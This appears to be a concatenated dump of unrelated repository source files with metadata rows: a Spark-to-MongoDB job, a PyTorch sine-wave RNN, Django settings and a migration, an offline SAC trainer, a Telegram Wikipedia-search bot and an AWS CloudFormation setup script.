    client = MongoClient('192.168.11.201', 32773)
    db = client['twitter']
    collection = db['country']
    for item in entry.collect():
        collection.find_one_and_update({'country':item[0]}, {'$inc':{'count':item[1]}}, upsert = True)
    print('Done Batch')
wordCounts.foreachRDD(function)
# Test end
ssc.start() # Start the computation
ssc.awaitTermination() # Wait for the computation to terminate
| [
"r04921087@ntu.edu.tw"
] | r04921087@ntu.edu.tw |
96164464f24ee51181a36ffef0bb4a7a56bde3c5 | 7f227c62d25d09496dc5aabd9d58fc971c7c820d | /main.py | 4601d7ce2812480fd23ff394cffb3d3cee64b020 | [] | no_license | 0x15F9/ColabDemo | 6cd821ad6295cb30a656d506372882f14428adab | 093b374b4493146c787b48f46a6633bb1351fe20 | refs/heads/master | 2023-03-24T01:59:34.293793 | 2021-03-22T07:37:24 | 2021-03-22T07:37:24 | 350,248,808 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | for i in range(10):
print("Hello") | [
"isfaaqg@gmail.com"
] | isfaaqg@gmail.com |
a58811e0468e1f1caa16bc614773f6b9ff6b3b8e | 0ae31d72d267c5de55fc62040c2308a733efc109 | /RNN_Sin.py | 97a37d075e865ab399fbdfd8adb9ca9661672bdc | [] | no_license | laloceh/Torch_tests | c8188c636e09c260496c2d701f9f832de986f084 | cf13f8fa0031978b9966623ad86aa1cad45ccfea | refs/heads/master | 2022-09-07T23:02:12.932596 | 2020-05-29T22:12:59 | 2020-05-29T22:12:59 | 261,090,212 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,178 | py | import torch
from torch.autograd import Variable
import numpy as np
import pylab as pl
import torch.nn.init as init
import sys
# --- Hyperparameters and training data for the hand-rolled RNN --------------
dtype = torch.FloatTensor
input_size = 7   # 1 scalar input concatenated with the 6-dim hidden state
hidden_size = 6
output_size = 1
epochs = 300
seq_length = 20
lr = 0.1
# One period-ish of a sine wave sampled at seq_length+1 points.
data_time_steps = np.linspace(2, 10, seq_length+1)
data = np.sin(data_time_steps)
data.resize((seq_length+1), 1)
print(data)
print(len(data))
# Inputs are the first seq_length samples; targets are the same series
# shifted by one step (next-value prediction).
# NOTE(review): torch.autograd.Variable is deprecated; plain tensors with
# requires_grad would be the modern equivalent.
x = Variable(torch.Tensor(data[:-1]).type(dtype), requires_grad=False)
y = Variable(torch.Tensor(data[1:]).type(dtype), requires_grad=False)
print(x)
print(y)
# Weight matrices, initialized from normal distributions.
w1 = torch.FloatTensor(input_size, hidden_size).type(dtype)
init.normal_(w1, 0.0, 0.4)
w1 = Variable(w1, requires_grad=True)
w2 = torch.FloatTensor(hidden_size, output_size).type(dtype)
init.normal_(w2, 0.0, 0.3)
w2 = Variable(w2, requires_grad=True)
def forward(input, context_state, w1, w2):
    """One RNN step: concatenate the input with the hidden state, compute the
    new tanh hidden state, and project it to the output."""
    combined = torch.cat((input, context_state), 1)
    new_state = torch.tanh(combined.mm(w1))
    output = new_state.mm(w2)
    return (output, new_state)
######### Training
for i in range(epochs):
    total_loss = 0
    # Fresh zero hidden state at the start of every epoch.
    context_state = Variable(torch.zeros((1, hidden_size)).type(dtype), requires_grad=True)
    for j in range(x.size(0)):
        input = x[j:(j+1)]
        target = y[j:(j+1)]
        (pred, context_state) = forward(input, context_state, w1, w2)
        # Half squared error on the single predicted step.
        loss = (pred - target).pow(2).sum()/2
        total_loss += loss
        loss.backward()
        # Manual SGD step followed by zeroing the accumulated gradients.
        w1.data -= lr * w1.grad.data
        w2.data -= lr * w2.grad.data
        w1.grad.data.zero_()
        w2.grad.data.zero_()
        # Detach the hidden state so gradients don't flow across time steps.
        context_state = Variable(context_state.data)
    if i % 10 == 0:
        print("Epoch: {} loss: {}".format(i, total_loss))
##### Predictions
context_state = Variable(torch.zeros( (1, hidden_size)).type(dtype), requires_grad=False )
predictions = []
for i in range(x.size(0)):
    input = x[i:i+1]
    (pred, context_state) = forward(input, context_state, w1, w2)
    context_state = context_state
    predictions.append(pred.data.numpy().ravel()[0])
print(predictions)
# Plot the ground-truth series against the one-step-ahead predictions.
pl.scatter(data_time_steps[:-1], x.data.numpy(), s=90, label="Actual")
pl.scatter(data_time_steps[1:], predictions, label="Predicted")
pl.legend()
pl.show()
| [
"laloceh@hotmail.com"
] | laloceh@hotmail.com |
d8a4bb1467874a71d871c36cf87268c75bf2c1fa | a656125738208f60b997edd742ce62feb4dd8719 | /classes/migrations/0008_remove_classschedule_attended_members.py | d59d88f2b72c4e666a7eac8bf215f8015e939425 | [] | no_license | Mohsin0348/gym | 3c9fdb7cc70c1cbfcf63e6a26ad946e2549c2b69 | 602ece728c7dc8ba66c29df901d6e1e8d14b6040 | refs/heads/master | 2023-08-28T20:23:17.804831 | 2021-11-15T07:00:02 | 2021-11-15T07:00:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | # Generated by Django 3.2.8 on 2021-11-15 04:58
from django.db import migrations
class Migration(migrations.Migration):
    # Removes the 'attended_members' field from the ClassSchedule model.
    dependencies = [
        ('classes', '0007_alter_weekday_day'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='classschedule',
            name='attended_members',
        ),
    ]
| [
"mohsin.mahbub.jim@gmail.com"
] | mohsin.mahbub.jim@gmail.com |
a2837fe0b71d24624074f3a1b846dbe016c02ce0 | 2c7d4bd9649d5ea4962148c3aebde37f3f9e667b | /config/settings.py | 5af70526b7793e13500fa01bcc9cd9a62cbcefc3 | [] | no_license | bigdata8000/blog-app | 071cbec1aaa76ff9509b7d84ecb0913cf11e68ce | c4b425d3e8dd720b0b30778eab75e4ce86b61dc3 | refs/heads/master | 2023-03-31T12:25:30.748507 | 2021-04-03T20:31:40 | 2021-04-03T20:31:40 | 354,388,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,247 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repo; for any non-dev deployment
# it should be rotated and loaded from the environment instead.
SECRET_KEY = 'dv!1b#+n&0go4kktak_5w!^7i)c4s0=!mo0)3%jtf444-y2^p)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Must be populated with the served hostnames before DEBUG is turned off.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
'accounts',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [str(BASE_DIR.joinpath('templates'))],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [str(BASE_DIR.joinpath('static'))]
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home'
| [
"bigdata8000@gmail.com"
] | bigdata8000@gmail.com |
1bbb189e92544af4163452162e9a38b09741f910 | b4e1848bb381db8e7c17935cfd7a05d4027efd77 | /bear/rlkit/torch/sac/sac_constant.py | 36e03f3b671dd73ed65c279215347280b6d03252 | [
"MIT",
"Apache-2.0"
] | permissive | junmokane/AI602_Project | 95c46d148bce391f0feb750da3583f16b8abf57e | 59c132ae04751f9fb6cf6ebb491042cbf4de003d | refs/heads/master | 2023-02-16T16:24:47.393118 | 2021-01-14T05:47:58 | 2021-01-14T05:47:58 | 303,891,598 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,074 | py | from collections import OrderedDict
import numpy as np
import torch
import torch.optim as optim
from torch import nn as nn
import rlkit.torch.pytorch_util as ptu
from rlkit.core.eval_util import create_stats_ordered_dict
from rlkit.torch.torch_rl_algorithm import TorchTrainer
from rlkit.torch.networks import FlattenMlp_Dropout
from uncertainty_modeling.rl_uncertainty.rank1.r1bnn import Model
from uncertainty_modeling.rl_uncertainty.model import RegNetBase, SWAG, RaPP, get_diffs
def unc_premodel(env, env_name, model_name):
    """Build the pretrained uncertainty model for `env` and load its weights.

    Supported model_name values: 'mc_dropout', 'rank1', 'rapp', 'swag'.
    The checkpoint is loaded from
    ./uncertainty_modeling/rl_uncertainty/<model_name>/model/<env_name>/model_1980.pt.

    Raises AttributeError for an unrecognized model_name (same exception
    type as before, now with a message).
    """
    path = './uncertainty_modeling/rl_uncertainty'
    obs_dim = env.observation_space.low.size
    action_dim = env.action_space.low.size
    # The uncertainty model scores concatenated (state, action) vectors.
    input_size = obs_dim + action_dim
    model = None
    if model_name == 'mc_dropout':
        model = FlattenMlp_Dropout(  # Check the dropout layer!
            input_size=input_size,
            output_size=1,
            hidden_sizes=[256, 256],
        ).cuda()
    elif model_name == 'rank1':
        model = Model(x_dim=input_size, h_dim=10, y_dim=1, n=10).cuda()
    elif model_name == 'rapp':
        model = RaPP(input_size).cuda()
    elif model_name == 'swag':
        kwargs = {"dimensions": [200, 50, 50, 50],
                  "output_dim": 1,
                  "input_dim": input_size}
        args = list()
        model = SWAG(RegNetBase, subspace_type="pca", *args, **kwargs,
                     subspace_kwargs={"max_rank": 10, "pca_rank": 10})
        model.cuda()
    # `is None` instead of `== None`; also carry a message for debuggability.
    if model is None:
        raise AttributeError("unknown uncertainty model: {}".format(model_name))
    model.load_state_dict(torch.load('{}/{}/model/{}/model_1980.pt'.format(path, model_name, env_name)))
    return model
def uncertainty(state, action, pre_model, pre_model_name):
    """Score (state, action) pairs with the pretrained uncertainty model.

    Only the 'rapp' model is implemented: the reconstruction differences
    from get_diffs are squared and averaged per sample, giving one
    uncertainty value per batch row (returned on CUDA).

    NOTE(review): any other pre_model_name calls exit(), killing the
    process (SystemExit) instead of raising a descriptive error — confirm
    whether other model types were meant to be supported here.
    """
    with torch.no_grad():
        if pre_model_name == 'rapp':
            dif = get_diffs(torch.cat([state, action], dim=1), pre_model)
            # Per-layer diffs come back as numpy arrays; concatenate along the
            # feature axis, then reduce to a per-sample mean squared diff.
            difs = torch.cat([torch.from_numpy(i) for i in dif], dim=-1).cuda()
            dif = (difs ** 2).mean(axis=1)
            '''
            unc = beta / dif # B
            unc = unc.unsqueeze(1) # Bx1
            # TODO: clipping on uncertainty
            # unc_critic = torch.clamp(unc, 0.0, 1.5)
            unc_critic = unc
            '''
            unc_critic = dif
            return unc_critic
        else:
            exit()
class SACTrainer(TorchTrainer):
    """Soft Actor-Critic trainer with a constant uncertainty penalty.

    A pretrained uncertainty model scores the entire offline dataset once in
    __init__; the mean (or max, per `sub_q`) of those scores is frozen into
    `q_const` and subtracted, scaled by `beta`, from both the policy
    objective and the Bellman targets during training.
    """
    def __init__(
            self,
            pre_model,
            env_name,
            env,
            policy,
            qf1,
            qf2,
            target_qf1,
            target_qf2,
            discount=0.99,
            reward_scale=1.0,
            policy_lr=1e-3,
            qf_lr=1e-3,
            optimizer_class=optim.Adam,
            soft_target_tau=1e-2,
            target_update_period=1,
            plotter=None,
            render_eval_paths=False,
            use_automatic_entropy_tuning=True,
            target_entropy=None,
            policy_eval_start=0,
            beta=1.0,
            sub_q = 'mean',
    ):
        super().__init__()
        self.env = env
        self.policy = policy
        self.qf1 = qf1
        self.qf2 = qf2
        self.target_qf1 = target_qf1
        self.target_qf2 = target_qf2
        self.soft_target_tau = soft_target_tau
        self.target_update_period = target_update_period
        # variables for sac uncertainty
        self._current_epoch = 0
        self.policy_eval_start = policy_eval_start
        self.beta = beta
        self.use_automatic_entropy_tuning = use_automatic_entropy_tuning
        if self.use_automatic_entropy_tuning:
            if target_entropy:
                self.target_entropy = target_entropy
            else:
                self.target_entropy = -np.prod(self.env.action_space.shape).item()  # heuristic value from Tuomas
            self.log_alpha = ptu.zeros(1, requires_grad=True)
            self.alpha_optimizer = optimizer_class(
                [self.log_alpha],
                lr=policy_lr,
            )
        self.plotter = plotter
        self.render_eval_paths = render_eval_paths
        self.qf_criterion = nn.MSELoss()
        self.vf_criterion = nn.MSELoss()
        self.policy_optimizer = optimizer_class(
            self.policy.parameters(),
            lr=policy_lr,
        )
        self.qf1_optimizer = optimizer_class(
            self.qf1.parameters(),
            lr=qf_lr,
        )
        self.qf2_optimizer = optimizer_class(
            self.qf2.parameters(),
            lr=qf_lr,
        )
        self.discount = discount
        self.reward_scale = reward_scale
        self.eval_statistics = OrderedDict()
        self._n_train_steps_total = 0
        self._need_to_update_eval_statistics = True
        self.discrete = False
        self.pre_model_name = pre_model
        self.pre_model = unc_premodel(self.env, env_name, pre_model)
        self.dataset = env.get_dataset()
        all_obs = torch.tensor(self.dataset['observations'])
        all_act = torch.tensor(self.dataset['actions'])
        # Global (element-wise over the whole tensor) min/max, used below to
        # min-max normalize observations and actions into [0, 1].
        self.min_obs = torch.min(all_obs)
        self.max_obs = torch.max(all_obs)
        self.min_act = torch.min(all_act)
        self.max_act = torch.max(all_act)
        all_obs, all_act = self.normalize_state_action(all_obs, all_act)
        # Score the entire dataset once; the reduced score becomes the fixed
        # penalty used in train_from_torch.
        score = uncertainty(all_obs, all_act, self.pre_model, self.pre_model_name)
        if sub_q == 'mean':
            self.q_const = torch.mean(score)
        elif sub_q == 'max':
            self.q_const = torch.max(score)
        else:
            raise ValueError
    def normalize_state_action(self, state, action):
        """Min-max normalize state and action into [0, 1] using the
        dataset-wide bounds computed in __init__."""
        state = (state - self.min_obs) / (self.max_obs - self.min_obs)
        action = (action - self.min_act) / (self.max_act - self.min_act)
        return state, action
        # NOTE(review): unreachable duplicate of the return above (dead code).
        return state, action
    def train_from_torch(self, batch):
        # One SAC gradient step on a batch of offline transitions.
        self._current_epoch += 1
        rewards = batch['rewards']
        terminals = batch['terminals']
        obs = batch['observations']
        actions = batch['actions']
        next_obs = batch['next_observations']
        """
        Policy and Alpha Loss and Beta Uncertainty Loss
        """
        new_obs_actions, policy_mean, policy_log_std, log_pi, *_ = self.policy(
            obs, reparameterize=True, return_log_prob=True,
        )
        if self.use_automatic_entropy_tuning:
            alpha_loss = -(self.log_alpha * (log_pi + self.target_entropy).detach()).mean()
            self.alpha_optimizer.zero_grad()
            alpha_loss.backward()
            self.alpha_optimizer.step()
            alpha = self.log_alpha.exp()
        else:
            alpha_loss = 0
            alpha = 1
        q_new_actions = torch.min(
            self.qf1(obs, new_obs_actions),
            self.qf2(obs, new_obs_actions),
        )
        # policy uncertainty
        # Constant penalty: shifts the Q value used in the policy objective.
        policy_unc = self.q_const
        policy_loss = (alpha * log_pi - (q_new_actions - self.beta * policy_unc)).mean()
        if self._current_epoch < self.policy_eval_start:
            # Warm-up phase: behavior cloning (maximize log-prob of dataset actions).
            policy_log_prob = self.policy.log_prob(obs, actions)
            policy_loss = (alpha * log_pi - policy_log_prob).mean()
        """
        QF Loss and Beta Uncertainty Loss
        """
        q1_pred = self.qf1(obs, actions)
        q2_pred = self.qf2(obs, actions)
        # Make sure policy accounts for squashing functions like tanh correctly!
        new_next_actions, _, _, new_log_pi, *_ = self.policy(
            next_obs, reparameterize=True, return_log_prob=True,
        )
        target_q_values = torch.min(
            self.target_qf1(next_obs, new_next_actions),
            self.target_qf2(next_obs, new_next_actions),
        ) - alpha * new_log_pi
        # critic uncertainty
        # Same constant penalty applied to the Bellman target.
        critic_unc = self.q_const
        target_q_values = target_q_values - self.beta * critic_unc
        q_target = self.reward_scale * rewards + (1. - terminals) * self.discount * target_q_values
        qf1_loss = self.qf_criterion(q1_pred, q_target.detach())
        qf2_loss = self.qf_criterion(q2_pred, q_target.detach())
        """
        Update networks
        """
        self.qf1_optimizer.zero_grad()
        qf1_loss.backward()
        self.qf1_optimizer.step()
        self.qf2_optimizer.zero_grad()
        qf2_loss.backward()
        self.qf2_optimizer.step()
        self.policy_optimizer.zero_grad()
        policy_loss.backward()
        self.policy_optimizer.step()
        """
        Soft Updates
        """
        if self._n_train_steps_total % self.target_update_period == 0:
            ptu.soft_update_from_to(
                self.qf1, self.target_qf1, self.soft_target_tau
            )
            ptu.soft_update_from_to(
                self.qf2, self.target_qf2, self.soft_target_tau
            )
        """
        Save some statistics for eval
        """
        if self._need_to_update_eval_statistics:
            self._need_to_update_eval_statistics = False
            """
            Eval should set this to None.
            This way, these statistics are only computed for one batch.
            """
            policy_loss = (log_pi - q_new_actions).mean()
            self.eval_statistics['QF1 Loss'] = np.mean(ptu.get_numpy(qf1_loss))
            self.eval_statistics['QF2 Loss'] = np.mean(ptu.get_numpy(qf2_loss))
            self.eval_statistics['Policy Loss'] = np.mean(ptu.get_numpy(
                policy_loss
            ))
            self.eval_statistics.update(create_stats_ordered_dict(
                'Q1 Predictions',
                ptu.get_numpy(q1_pred),
            ))
            self.eval_statistics.update(create_stats_ordered_dict(
                'Q2 Predictions',
                ptu.get_numpy(q2_pred),
            ))
            self.eval_statistics.update(create_stats_ordered_dict(
                'Q Targets',
                ptu.get_numpy(q_target),
            ))
            self.eval_statistics.update(create_stats_ordered_dict(
                'Log Pis',
                ptu.get_numpy(log_pi),
            ))
            self.eval_statistics.update(create_stats_ordered_dict(
                'Policy mu',
                ptu.get_numpy(policy_mean),
            ))
            self.eval_statistics.update(create_stats_ordered_dict(
                'Policy log std',
                ptu.get_numpy(policy_log_std),
            ))
            if self.use_automatic_entropy_tuning:
                self.eval_statistics['Alpha'] = alpha.item()
                self.eval_statistics['Alpha Loss'] = alpha_loss.item()
        self._n_train_steps_total += 1
    def get_diagnostics(self):
        """Return the statistics collected during the last eval batch."""
        return self.eval_statistics
    def end_epoch(self, epoch):
        # Re-arm statistics collection for the next epoch's first batch.
        self._need_to_update_eval_statistics = True
    @property
    def networks(self):
        """All trainable/target networks, e.g. for device moves and train/eval mode."""
        return [
            self.policy,
            self.qf1,
            self.qf2,
            self.target_qf1,
            self.target_qf2,
        ]
    def get_snapshot(self):
        # NOTE(review): target_qf1/target_qf2 are snapshotted as self.qf1 and
        # self.qf2 here rather than self.target_qf1/self.target_qf2 — this
        # looks like a bug; confirm before relying on restored snapshots.
        return dict(
            policy=self.policy,
            qf1=self.qf1,
            qf2=self.qf2,
            target_qf1=self.qf1,
            target_qf2=self.qf2,
        )
| [
"scey26@naver.com"
] | scey26@naver.com |
b0e3a882a9cb2bf2f6a1e29d61545ed83bc64a05 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02882/s441562654.py | 2251e4e406faa3b13c7d32923f7711a41c800a0e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | a, b, x = map(int, input().split())
# Tilt a rectangular tank (base a x a, height b, holding x units of water)
# until it is about to spill; print the tilt angle in degrees.
# `t` is the tangent of the tilt angle in each geometric case.
if x > (a**2)*b/2:
    # More than half full: the water surface still covers the whole base.
    t = 2*((a**2)*b-x)/(a**3)
else:
    # At most half full: the water surface no longer reaches the far base edge.
    t = a*(b**2)/(2*x)
import math
ans = math.degrees(math.atan(t))
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
f13e05ee13f0f5939d2653f4b9b687685605c95d | 81f5103fe389e6172b79abb257df2f54bfa2e4ea | /handlers/users/searches/wikipedia.py | b54eeb86b1306c498238e18913caa60529185a5c | [] | no_license | DobbiKov/google-wiki-bot | 53f6ddebfc508203f31d888576506ce6b3f481c6 | f5634491f2c369b252d727f4f4834ff994e1d911 | refs/heads/master | 2023-08-01T14:21:29.516057 | 2021-09-14T20:28:39 | 2021-09-14T20:28:39 | 406,419,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,882 | py | from logging import log
from typing import Text
from aiogram import types
from aiogram.dispatcher import FSMContext
from aiogram.types import user
from aiogram.types.message import Message
from environs import LogLevelField
from states.search_state import Search
from keyboards.inline.start_inline import start_inline
from utils.search.search import search as utilsearch
from utils.wikipedia import wikipediaSearch
from utils.consts import CALLBACK_DATA_SEARCH_GOOGLE, CALLBACK_DATA_SEARCH_WIKIPEDIA, CALLBACK_DATA_TRANSLATE_EN, CALLBACK_DATA_TRANSLATE_RU, CLOSE_INLINE_MESSAGE
from loader import dp, bot
from data.config import ADMINS
@dp.callback_query_handler(lambda c: c.data == CALLBACK_DATA_SEARCH_WIKIPEDIA)
async def choose_search(call: types.CallbackQuery, state: FSMContext):
    # Triggered when the user picks the "Wikipedia" search button: reads the
    # query from FSM state, runs the search, sends the result list, then
    # deletes the originating message. Errors notify the user and all admins.
    try:
        data = await state.get_data()
        # "null" is the sentinel meaning "no query stored"; data.get may
        # overwrite it with the stored search string (or None if missing —
        # NOTE(review): None would still pass the != "null" check below).
        text = "null"
        text = data.get("search")
        markup3 = types.InlineKeyboardMarkup()
        if(text != "null"):
            [text, markup3] = await bot_choose_search(call, state, text)
        else:
            text = "Error!"
        # print(text)
        await bot.send_message(call.from_user.id, text, reply_markup=markup3)
    except Exception as ex:
        print(ex)
        await bot.send_message(call.from_user.id, f"Технические неполадки, приносим свои извинения.")
        for admin in ADMINS:
            await bot.send_message(admin, f"У пользователя {call.from_user.full_name} произошла ошибка при поиске!")
    # Always remove the inline-keyboard message the callback came from.
    await bot.delete_message(call.message.chat.id, call.message.message_id)
async def bot_choose_search(call: types.CallbackQuery, state: FSMContext, text: str):
    """Search Russian Wikipedia for `text` and build an inline keyboard of hits.

    The result list is stored in FSM state under 'wikipediaSearches' so the
    index encoded in each button's callback_data ("d_wiki_s_<idx>") can be
    resolved later by choose_article. Returns [reply_text, keyboard].
    """
    markup3 = types.InlineKeyboardMarkup()
    arr = wikipediaSearch.search("ru", text)
    if arr[0] == []:
        text = "Вариантов ответа по вашему запросу не найдено!"
    else:
        text = "Варианты ответа по вашему запросу:"
    wikipediaSearches = arr[0]
    # Fix: enumerate instead of list.index(i) — index() returns the FIRST
    # occurrence, so duplicate titles all pointed at the same (wrong) article.
    for idx, title in enumerate(arr[0]):
        if title == "":
            continue
        try:
            button = types.InlineKeyboardButton(title, callback_data="d_wiki_s_{0}".format(idx))
        except Exception:
            # Skip titles the button constructor rejects (narrowed from a bare except).
            continue
        markup3.add(button)
    state = dp.current_state(chat=call.from_user.id, user=call.from_user.id)
    await state.update_data(wikipediaSearches=wikipediaSearches)
    _button = types.InlineKeyboardButton("Закрыть", callback_data=CLOSE_INLINE_MESSAGE)
    markup3.add(_button)
    return [text, markup3]
@dp.callback_query_handler(lambda c: c.data.startswith("d_wiki_s_"))
async def choose_article(call: types.CallbackQuery, state: FSMContext):
    # Triggered when the user picks one of the search-result buttons: loads
    # the stored result list, fetches the chosen article, sends it, and
    # finishes the FSM conversation. Errors notify the user and all admins.
    try:
        data = await state.get_data()
        # "null" is the sentinel for "no stored results"; overwritten by the
        # list saved earlier in bot_choose_search (or None if missing).
        text = "null"
        text = data.get("wikipediaSearches")
        markup3 = types.InlineKeyboardMarkup()
        if(text != "null"):
            [text, markup3] = await botWikipediaArticle(call, state, text)
        else:
            text = "Error!"
        # print(text)
        await bot.send_message(call.from_user.id, text, reply_markup=markup3)
        await state.finish()
    except Exception as ex:
        print(ex)
        await bot.send_message(call.from_user.id, f"Технические неполадки, приносим свои извинения.")
        for admin in ADMINS:
            await bot.send_message(admin, f"У пользователя {call.from_user.full_name} произошла ошибка при поиске!")
    # Always remove the inline-keyboard message the callback came from.
    await bot.delete_message(call.message.chat.id, call.message.message_id)
async def botWikipediaArticle(call: types.CallbackQuery, state: FSMContext, wikiSearch):
    """Resolve the index from callback_data ("d_wiki_s_<idx>") into a title
    from `wikiSearch`, fetch the article text and link, and return
    [message_text, keyboard] for the reply. On missing title/article a
    generic error message with a close button is returned instead."""
    text = call.data.replace("d_wiki_s_", "")
    ourSearch = wikiSearch[int(text)]
    # NOTE(review): userId is assigned but never used.
    userId = call.from_user.id
    _button = types.InlineKeyboardButton("Закрыть", callback_data=CLOSE_INLINE_MESSAGE)
    markup3 = types.InlineKeyboardMarkup()
    # NOTE(review): idiomatic form would be `ourSearch is None`.
    if ourSearch == None or ourSearch == "":
        markup3.add(_button)
        return ["Возникла техническая ошибка. Приносим свои извинения.", markup3]
    article = "{0}\n\n".format(ourSearch)
    tempArticle = wikipediaSearch.article("ru", ourSearch)
    if tempArticle == None or tempArticle == "":
        markup3.add(_button)
        return ["Возникла техническая ошибка. Приносим свои извинения.", markup3]
    article += tempArticle
    # Attach the article URL button only when a link was actually found.
    link = wikipediaSearch.link("ru", ourSearch)
    if link != "" and link != None:
        button = types.InlineKeyboardButton("Ссылка", url=link)
        markup3.add(button)
    markup3.add(_button)
return [article, markup3] | [
"dobbikov@gmail.com"
] | dobbikov@gmail.com |
e6f3da7777d83a01afc7ca1cc7eb9a283bd37e3f | 6c60a70bbf6b81045a71dd77b700f1498d7f596e | /build_from_scratch.py | 3a00bfb8c45bf26a6575823561dc17dec886c024 | [] | no_license | madcore-ai/cloudformation | b0a5e1af16e660d82ed4fb15fcc04825ac39fd55 | e111bb043661d04b5568240861e9802dac4914f5 | refs/heads/master | 2020-12-24T09:37:27.956300 | 2017-03-24T20:49:32 | 2017-03-24T20:49:32 | 73,280,393 | 0 | 0 | null | 2017-06-02T11:56:35 | 2016-11-09T12:00:55 | Python | UTF-8 | Python | false | false | 3,281 | py | """
Script to create madcore cluster from scratch
"""
import subprocess
import json
import os
from collections import OrderedDict
INSTANCE_TYPE = 'm3.medium'
SPOT_PRICE = '0.02'
SUBDOMAIN = 'chirgeo'
def run_cmd(cmd, to_json=True):
    """Run a shell command from this script's directory and return its stdout.

    If to_json is True the output is parsed as JSON (and, for aws 'describe'
    calls, the stack Outputs list is folded into a dict by output_to_dict);
    unparsable output is logged and yields None, matching the original
    best-effort behaviour. If to_json is False the raw stdout bytes are
    returned (previously the function fell through and returned None).
    """
    print("RUN CMD: %s..." % cmd)
    cwd = os.path.dirname(os.path.abspath(__file__))
    process = subprocess.Popen(cmd, stdout=subprocess.PIPE, cwd=cwd, shell=True)
    out, err = process.communicate()
    if not to_json:
        # Backward compatible: existing to_json=False callers ignore the return.
        return out
    try:
        o = json.loads(out)
    except ValueError:
        # Narrowed from a bare except; JSONDecodeError subclasses ValueError.
        print("Continue")
        return None
    if 'describe' in cmd:
        o = output_to_dict(o)
    return o
def output_to_dict(output):
    """Fold the first stack's Outputs list into an {OutputKey: OutputValue}
    dict, in place, and return the modified describe-stacks payload."""
    entries = output['Stacks'][0]['Outputs']
    output['Stacks'][0]['Outputs'] = {
        entry['OutputKey']: entry['OutputValue'] for entry in entries
    }
    return output
def wait_until_stack_completed(stack_name):
    """Block until CloudFormation stack MADCORE-<stack_name> finishes creating."""
    wait_cmd = 'aws cloudformation wait stack-create-complete --stack-name MADCORE-{0}'.format(stack_name)
    run_cmd(wait_cmd, to_json=False)
def change_params(stack_type, replacer):
    """Rewrite <stack_type>-parameters.json, substituting ParameterValue
    entries whose ParameterKey appears in `replacer` (order preserved)."""
    filename = '%s-parameters.json' % stack_type
    with open(filename, 'r') as f:
        data = json.load(f, object_pairs_hook=OrderedDict)
    for param in data:
        key = param['ParameterKey']
        if key in replacer and param['ParameterValue'] != replacer[key]:
            param['ParameterValue'] = replacer[key]
    with open(filename, 'w') as f:
        f.write(json.dumps(data, indent=2, sort_keys=False) + '\n')
if __name__ == '__main__':
    # Provision the madcore stacks in dependency order: network -> S3 ->
    # follow-me security group -> core instance -> spot cluster -> DNS.
    # Each stage feeds its CloudFormation Outputs into the next stage's
    # parameter file via change_params before launching it.
    run_cmd('./network-create.sh')
    wait_until_stack_completed("Net")
    net_output = run_cmd('./network-describe.sh')['Stacks'][0]['Outputs']
    print(net_output)
    run_cmd('./s3-create.sh')
    wait_until_stack_completed("S3")
    s3_output = run_cmd('./s3-describe.sh')['Stacks'][0]['Outputs']
    print(s3_output)
